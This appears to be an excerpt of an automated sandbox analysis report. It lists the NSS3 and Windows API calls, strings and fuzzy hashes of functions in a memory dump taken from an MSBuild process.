Instruction Fuzzy Hash: 8AB10DB1B002059FEB00EF68D888ABA77B4FF09319F044164ED1597B11EB74E961CBE6

Function 6C68C4B0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 247COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C68C4D5

Part of subcall function 6C6DBE30: SECOID_FindOID_Util.NSS3(6C69311B,00000000,?,6C69311B,?), ref: 6C6DBE44

NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C68C516
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C68C530
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C68C54E
NSS_GetAlgorithmPolicy.NSS3(00000000,00000000), ref: 6C68C5CB
VFY_VerifyDataWithAlgorithmID.NSS3(00000002,?,?,?,?,?,?), ref: 6C68C712
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C68C725
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C68C742
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C68C751
PL_FinishArenaPool.NSS3(?), ref: 6C68C77A
NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C68C78F
NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C68C7A9

Strings

security, xrefs: 6C68C63F

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Algorithm$Policy$Util$ErrorTag_$ArenaDataFindFinishPoolVerifyWith
String ID: security
API String ID: 1085474831-3315324353
Opcode ID: 6adbaf5e98ffa77d02c2f479baea353469a18f6639dec35c7b6f8f60040b8500
Instruction ID: 56eb5d37bb21b09a8642e7f34319d2346664a0b3316444ab6a176cc832eca82d
Opcode Fuzzy Hash: 6adbaf5e98ffa77d02c2f479baea353469a18f6639dec35c7b6f8f60040b8500
Instruction Fuzzy Hash: 52810971C06109BAEF10EB54DC44BEE7774EF0531CF244325E903A6A91E721D959CABE

Function 6C6F4500 Relevance: 28.8, APIs: 19, Instructions: 319threadCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(6C6F3803,?,6C6F3817,00000000), ref: 6C6F450E

Part of subcall function 6C6E07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C688298,?,?,?,6C67FCE5,?), ref: 6C6E07BF
Part of subcall function 6C6E07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6E07E6
Part of subcall function 6C6E07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E081B
Part of subcall function 6C6E07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E0825

PR_SetError.NSS3(FFFFE005,00000000,?,6C6F3817,00000000), ref: 6C6F4550
SECOID_FindOIDByTag_Util.NSS3(00000004,00000000), ref: 6C6F45B5
SECOID_FindOIDByTag_Util.NSS3(000000BF,00000000), ref: 6C6F4709
SECOID_GetAlgorithmTag_Util.NSS3(?,00000000), ref: 6C6F4727
SECOID_GetAlgorithmTag_Util.NSS3(?,?,00000000), ref: 6C6F473B
PORT_NewArena_Util.NSS3(00000400,?,?,?,?,?,?,?,00000000), ref: 6C6F4801
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C7B2DA0,?,?,?,?,?,?,?,?,00000000), ref: 6C6F482E
PR_GetCurrentThread.NSS3 ref: 6C6F48F3
PR_SetError.NSS3(FFFFE02F,00000000), ref: 6C6F4923
PR_SetError.NSS3(FFFFE02F,00000000), ref: 6C6F4937
SECKEY_DestroyPublicKey.NSS3(?,?,?,00000000), ref: 6C6F494E
PR_SetError.NSS3(FFFFE02F,00000000,?,?,?,00000000), ref: 6C6F4963
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6F4984
VFY_VerifyDataWithAlgorithmID.NSS3(?,?,?,6C6F21C2,?,?,?), ref: 6C6F499C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6F49B5
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,00000000), ref: 6C6F49C5
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C6F49DC
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6F49E9

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Util$Error$Arena_Tag_$AlgorithmFindFree$DestroyHashLookupPublicTable$ConstCurrentDataEncodeItem_ThreadVerifyWith
String ID:
API String ID: 3698863438-0
Opcode ID: 7fb6f70d3f2cf9991c33a730e781bc9cead6b234e7c8d97fd30663f7250e779e
Instruction ID: 2236c0d3461e06293285ca541988504602136173fc403239b688970ac53a85ea
Opcode Fuzzy Hash: 7fb6f70d3f2cf9991c33a730e781bc9cead6b234e7c8d97fd30663f7250e779e
Instruction Fuzzy Hash: CFA114B1E01204ABFF009A64DE40BFE3767AF0535CF244125EA35ABF91E771D84686AD

Function 6C6B4CD0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C6B4CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B4D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B4D37

Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963

PR_LogPrint.NSS3(?,00000000), ref: 6C6B4D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C6B4D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B4D8A
PR_LogPrint.NSS3(?,00000000), ref: 6C6B4DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C6B4DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C6B4E20

Strings

pulSize = 0x%p, xrefs: 6C6B4DB7
hObject = 0x%x, xrefs: 6C6B4D65, 6C6B4D75
hSession = 0x%x, xrefs: 6C6B4D12, 6C6B4D22
*pulSize = 0x%x, xrefs: 6C6B4E1B
nyl, xrefs: 6C6B4DD4, 6C6B4DFF
(CK_INVALID_HANDLE), xrefs: 6C6B4D30, 6C6B4D83
C_GetObjectSize, xrefs: 6C6B4CEE

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$nyl
API String ID: 1003633598-2540521321
Opcode ID: ac31d96c4b47a4ee604bdcca8671a73444e163339944206d5dd1e1db4b50dde8
Instruction ID: 49cdfa0617141b6512a9563bb9a238adde6b6171994e95d0f0a13925b9f61431
Opcode Fuzzy Hash: ac31d96c4b47a4ee604bdcca8671a73444e163339944206d5dd1e1db4b50dde8
Instruction Fuzzy Hash: 2641E772601105AFDB409F50DE8CBAA3BB5EB4A35DF044434F9087B611DF709A69CB6A

Function 6C74CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C74CC7B), ref: 6C74CD7A

Part of subcall function 6C74CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C6BC1A8,?), ref: 6C74CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C74CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C74CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C74CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C74CD8E

Part of subcall function 6C6705C0: PR_EnterMonitor.NSS3 ref: 6C6705D1
Part of subcall function 6C6705C0: PR_ExitMonitor.NSS3 ref: 6C6705EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C74CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C74CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C74CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C74CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C74CE48

Strings

ws2_32.dll, xrefs: 6C74CD75
wship6.dll, xrefs: 6C74CDE3
getaddrinfo, xrefs: 6C74CD88, 6C74CDF9
freeaddrinfo, xrefs: 6C74CD9F, 6C74CE10
getnameinfo, xrefs: 6C74CDB2, 6C74CE23

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: 145f6c29fe2fa905bba7677d48f27ab3952ffc4ebfd166182bcc395293e9c0c9
Instruction ID: 92d0d9b2dcadfa85d8142c29486c029421239ee5b2e3c438eca02d1f035bbad7
Opcode Fuzzy Hash: 145f6c29fe2fa905bba7677d48f27ab3952ffc4ebfd166182bcc395293e9c0c9
Instruction Fuzzy Hash: 6111D6A6E0252117E7116B762E4299B38585B4710EF18C934D815E5F02FF22D70C87FA

Function 6C6C4540 Relevance: 25.8, APIs: 17, Instructions: 349COMMON

Download Yara Rule

APIs

PK11_MakeIDFromPubKey.NSS3(00000000), ref: 6C6C4590
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C471C
TlsGetValue.KERNEL32 ref: 6C6C477C
EnterCriticalSection.KERNEL32(?), ref: 6C6C479A
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C6C484A
PK11_FreeSymKey.NSS3(?), ref: 6C6C4858
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C486A
PR_Unlock.NSS3(?), ref: 6C6C487E

Part of subcall function 6C72DD70: TlsGetValue.KERNEL32 ref: 6C72DD8C
Part of subcall function 6C72DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C72DDB4

PK11_FreeSymKey.NSS3(?), ref: 6C6C488C
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C489C
PK11_GetInternalSlot.NSS3 ref: 6C6C48B2
PK11_UnwrapPrivKey.NSS3(00000000,00000130,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,6C6A7F9D), ref: 6C6C48EC
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6C6C492A
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C4949
PR_SetError.NSS3(00000000,00000000), ref: 6C6C4977
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C4987
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C499B

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Item_UtilZfree$K11_$CriticalErrorFreeSectionValue$DestroyEnterFromInternalLeaveMakePrivPrivateSlotUnlockUnwrap
String ID:
API String ID: 1673584487-0
Opcode ID: 55cd4b6a6cc094b8d2bff1dd5b418e2bacee0b29d2f4f5de4e5611c5faa0bde9
Instruction ID: 7e58ce71319929a06d21931c962b6dc19f3b2a6eb56d55648d77801e89024513
Opcode Fuzzy Hash: 55cd4b6a6cc094b8d2bff1dd5b418e2bacee0b29d2f4f5de4e5611c5faa0bde9
Instruction Fuzzy Hash: 29E18D71E002699FDB20CF14CC44BEEBBB5EF04308F1485A9E819A7751E7729A94CF99

Function 6C6F0C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(*,ol), ref: 6C6F0C81

Part of subcall function 6C6DBE30: SECOID_FindOID_Util.NSS3(6C69311B,00000000,?,6C69311B,?), ref: 6C6DBE44

Part of subcall function 6C6C8500: SECOID_GetAlgorithmTag_Util.NSS3(6C6C95DC,00000000,00000000,00000000,?,6C6C95DC,00000000,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C8517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6F0CC4

Part of subcall function 6C6DFAB0: free.MOZGLUE(?,-00000001,?,?,6C67F673,00000000,00000000), ref: 6C6DFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C6F0CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C6F0D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C6F0D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C6F0D7D
free.MOZGLUE(00000000), ref: 6C6F0DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6F0DC1
free.MOZGLUE(00000000), ref: 6C6F0DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6F0E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C6F0E0F

Part of subcall function 6C6C95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C95E0
Part of subcall function 6C6C95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C95F5
Part of subcall function 6C6C95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C6C9609
Part of subcall function 6C6C95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C6C961D
Part of subcall function 6C6C95C0: PK11_GetInternalSlot.NSS3 ref: 6C6C970B
Part of subcall function 6C6C95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C6C9756
Part of subcall function 6C6C95C0: PK11_GetIVLength.NSS3(?), ref: 6C6C9767
Part of subcall function 6C6C95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C6C977E
Part of subcall function 6C6C95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C978E

Strings

*,ol, xrefs: 6C6F0DCC
-$ol, xrefs: 6C6F0C64
*,ol, xrefs: 6C6F0C69, 6C6F0DE0, 6C6F0C80, 6C6F0C8B, 6C6F0CAF

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID: *,ol$*,ol$-$ol
API String ID: 3136566230-3848321967
Opcode ID: 5319c04c76b2e39226f751383a71b2b52d61223db96ce6a35b1a83fd46888c52
Instruction ID: 34283563ebda4d4709a60c9d19a4bbde3e3fcebedae9528eb24ee52544609efe
Opcode Fuzzy Hash: 5319c04c76b2e39226f751383a71b2b52d61223db96ce6a35b1a83fd46888c52
Instruction Fuzzy Hash: B241F2B1901246ABEB009F64DC45BEF76B9EF0530CF144024E92567741EB35AA15CBFA

Function 6C6B6500 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 101COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_EncryptFinal), ref: 6C6B6526
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B6554
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B6563

Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963

PR_LogPrint.NSS3(?,00000000), ref: 6C6B6579
PR_LogPrint.NSS3( pLastEncryptedPart = 0x%p,?), ref: 6C6B6595
PR_LogPrint.NSS3( pulLastEncryptedPartLen = 0x%p,?), ref: 6C6B65B0
PR_LogPrint.NSS3( *pulLastEncryptedPartLen = 0x%x,?), ref: 6C6B661A

Strings

C_EncryptFinal, xrefs: 6C6B6521
pLastEncryptedPart = 0x%p, xrefs: 6C6B6590
hSession = 0x%x, xrefs: 6C6B653E, 6C6B654E
nyl, xrefs: 6C6B65C8, 6C6B65F6
pulLastEncryptedPartLen = 0x%p, xrefs: 6C6B65AB
*pulLastEncryptedPartLen = 0x%x, xrefs: 6C6B6615
(CK_INVALID_HANDLE), xrefs: 6C6B655C

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulLastEncryptedPartLen = 0x%x$ hSession = 0x%x$ pLastEncryptedPart = 0x%p$ pulLastEncryptedPartLen = 0x%p$ (CK_INVALID_HANDLE)$C_EncryptFinal$nyl
API String ID: 1003633598-1952597278
Opcode ID: 89041dd3d658252222c53016398a7be4d380e4da5b088c72e75629c45685c807
Instruction ID: 69498edf5d441c05692233a156751306596b077cc0eca29ce33185ae6a5304b1
Opcode Fuzzy Hash: 89041dd3d658252222c53016398a7be4d380e4da5b088c72e75629c45685c807
Instruction Fuzzy Hash: 3031A732601145EFDB44DF54DE8CB9A7BB5EB4A319F044434E908E7A11DF30DA68CBAA

Function 6C6E6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C7B1DE0,?), ref: 6C6E6CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6E6D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C6E6D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C6E6D82
DER_GetInteger_Util.NSS3(?), ref: 6C6E6DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6E6DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C6E6E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C6E6F19
PK11_DigestBegin.NSS3(00000000), ref: 6C6E6F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C6E6F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C6E7011
PK11_FreeSymKey.NSS3(00000000), ref: 6C6E7033
free.MOZGLUE(?), ref: 6C6E703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C6E7060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C6E7087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C6E70AF

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 9e0acc2e5000fb8c3a6ef946ac2162eb0b98a86d1d2790855bc4f7fd30954af5
Instruction ID: 33dc587034fdf5771f8922edf0feb5213736d785bb5f771706ae545a445c6e30
Opcode Fuzzy Hash: 9e0acc2e5000fb8c3a6ef946ac2162eb0b98a86d1d2790855bc4f7fd30954af5
Instruction Fuzzy Hash: 6CA119B190E2049BEB009B24DC45B9A3295DB8931CF24493BEA19CBBC1F775D845C75B

Function 6C6CE550 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 384COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6CE5A0

Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF

memcpy.VCRUNTIME140(?,?,?), ref: 6C6CE5F2

Strings

0, xrefs: 6C6CEA4D

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: ErrorValuememcpy
String ID: 0
API String ID: 3044119603-4108050209
Opcode ID: ab2621726d19c9de2f9cbd22893feb969ca2c069c919defbaea4277a1b3a1674
Instruction ID: 51f096913bdb67af37961c7a49c6dc95c6695db0be897b6fb59c99e1b5c075d7
Opcode Fuzzy Hash: ab2621726d19c9de2f9cbd22893feb969ca2c069c919defbaea4277a1b3a1674
Instruction Fuzzy Hash: B4F17CB1A002299FDB218F24CC85BDA77B5FF49318F0441A8E908A7641E775EE94CFD9

Function 6C6A2C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(#?jl,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C62
EnterCriticalSection.KERNEL32(0000001C,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C76
PL_HashTableLookup.NSS3(00000000,?,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C93

Part of subcall function 6C72DD70: TlsGetValue.KERNEL32 ref: 6C72DD8C
Part of subcall function 6C72DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C72DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23), ref: 6C6A2CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C69E477,?,?,?,00000001,00000000,?), ref: 6C6A2CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C69E477,?,?,?,00000001,00000000,?), ref: 6C6A2D4D
EnterCriticalSection.KERNEL32(?), ref: 6C6A2D61
PL_HashTableLookup.NSS3(?,?), ref: 6C6A2D71
PR_Unlock.NSS3(?), ref: 6C6A2D7E

Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707AD
Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707CD
Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707D6
Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C60204A), ref: 6C6707E4
Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,6C60204A), ref: 6C670864
Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C670880
Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,6C60204A), ref: 6C6708CB
Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708D7
Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708FB

Strings

#?jl, xrefs: 6C6A2C43

Memory Dump Source

